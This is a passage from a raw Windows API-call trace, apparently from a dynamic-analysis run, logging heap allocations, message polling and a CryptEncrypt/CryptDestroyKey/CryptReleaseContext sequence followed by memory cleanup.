(in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0165.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0165.512] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x800b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8010) returned 1 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0165.513] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.513] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.513] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.513] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.513] CharLowerBuffW (in: lpsz="byte[32785]", cchLength=0xb | out: lpsz="byte[32785]") returned 0xb [0165.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0165.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0165.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.515] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0165.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0165.515] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9fd1d8*, pdwDataLen=0x87e820*=0x800b, dwBufLen=0x8010 | out: pbData=0x9fd1d8*, pdwDataLen=0x87e820*=0x8010) returned 1 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0165.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0165.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0165.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0165.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0165.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0165.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.516] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0165.516] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0165.516] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.516] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.516] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.539] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0165.539] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.539] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.539] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0165.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.539] CryptDestroyKey (hKey=0x90af18) returned 1 [0165.539] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.540] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0165.540] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0165.540] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.540] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.540] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.540] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0165.540] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0165.540] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.541] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.541] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.541] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0165.541] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.541] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0165.541] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.541] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0165.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.541] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0165.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.542] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0165.542] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.542] FreeLibrary (hLibModule=0x74f20000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0165.542] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0165.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.543] CloseHandle (hObject=0x120) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: 